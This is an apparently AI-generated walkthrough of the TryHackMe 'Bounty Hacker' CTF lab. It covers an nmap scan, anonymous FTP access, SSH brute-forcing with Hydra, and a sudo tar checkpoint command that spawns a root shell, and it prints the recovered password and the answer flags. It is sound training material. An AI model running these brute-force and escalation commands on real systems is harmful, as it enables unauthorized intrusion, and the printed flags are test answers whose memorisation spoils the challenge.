Understanding the CTF Challenge
This content is an AI-generated summary. If you encounter any misinformation or problematic content, please report it to cyb.hub@proton.me.
This guide walks you through a Capture The Flag (CTF) challenge on TryHackMe called "Bounty Hacker." You'll learn how to perform an nmap scan, exploit open ports, and escalate privileges to gain root access.
Key Points
- Initial Scan: Start with an nmap scan to identify open ports.
- FTP Exploitation: Use anonymous FTP login to retrieve important files.
- SSH Bruteforce: Utilize Hydra to brute-force SSH login.
- Privilege Escalation: Use sudo permissions to gain root access.
Initial Scan
Begin with an nmap scan to identify open ports and services:
nmap -sC -sV -A -T4 -v -p- 10.10.69.196
This scan reveals the following open ports:
| Port | Service |
|---|---|
| 21 | FTP |
| 22 | SSH |
| 80 | HTTP |
FTP Exploitation
The FTP service allows anonymous login. Connect using the ftp command:
ftp 10.10.69.196
Retrieve the files locks.txt and task.txt.
Who Wrote the Task List?
The task.txt file reveals the author:
Answer: lin
Bruteforcing SSH
The locks.txt file contains a list of passwords. Since port 22 (SSH) is open, you can use Hydra to brute-force the SSH login:
- Create a
users.txtfile with the usernamelin. - Run Hydra with the wordlist:
hydra ssh://10.10.69.196 -L users.txt -P locks.txt
The successful login credentials are:
login: lin
password: RedDr4gonSynd1cat3
Retrieving user.txt
Connect to SSH using the discovered credentials to read the user.txt file:
Answer: THM{CR1M3_SyNd1C4T3}
Privilege Escalation
Run sudo -l to check the user's sudo permissions:
User lin may run the following commands on bountyhacker:
(root) /bin/tar
Use the following payload to escalate privileges:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Retrieve the root.txt file:
Answer: THM{80UN7Y_h4cK3r}
Learn More
For more information on privilege escalation techniques, visit GTFOBins.